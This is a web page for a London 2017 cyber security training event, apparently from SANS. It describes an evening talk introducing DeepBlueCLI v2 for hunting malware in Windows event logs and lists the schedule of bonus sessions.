Get unparalleled cyber security training from real-world practitioners in Nashville. Save $200 thru 10/30.

London November 2017

London, United Kingdom | Mon, Nov 27, 2017 - Sat, Dec 2, 2017
This event is over,
but there are more training opportunities.

Threat hunting through Windows event logs: Introducing DeepBlueCLI v2

  • Eric Conrad
  • Monday, November 27th, 7:00pm - 8:00pm

Recent malware attacks leverage PowerShell for post exploitation. Why? No EXE for antivirus or HIPS to squash, nothing saved to the filesystem, sites that use application whitelisting allow PowerShell, and little to no default logging.

Event logs continue to be the best source to centrally hunt malice in a Windows environment. Virtually all malware may be detected (including the latest PowerShell-fueled post exploitation) via event logs, after making small tweaks the logging configuration. DeepBlueCLI will go toe-to-toe with the latest attacks: this talk will explore the evidence malware leaves behind, leveraging Windows command line auditing (now natively available in Windows 7+) and PowerShell logging.


Bonus Sessions

The following bonus sessions are open to all paid attendees at no additional cost. There are many different types of events that fall into these categories:

  • SANS@Night: Evening presentations given after day courses have ended. This category includes Keynotes.
Monday, November 27
Session Speaker Time Type
Threat hunting through Windows event logs: Introducing DeepBlueCLI v2 Eric Conrad Monday, November 27th, 7:00pm - 8:00pm SANS@Night
Tuesday, November 28
Session Speaker Time Type
So, You Wanna be a Pentester? Adrien de Beaupre Tuesday, November 28th, 6:00pm - 7:00pm SANS@Night
Wednesday, November 29
Session Speaker Time Type
The 14 Absolute Truths of Security Keith Palmgren Wednesday, November 29th, 6:00pm - 7:00pm SANS@Night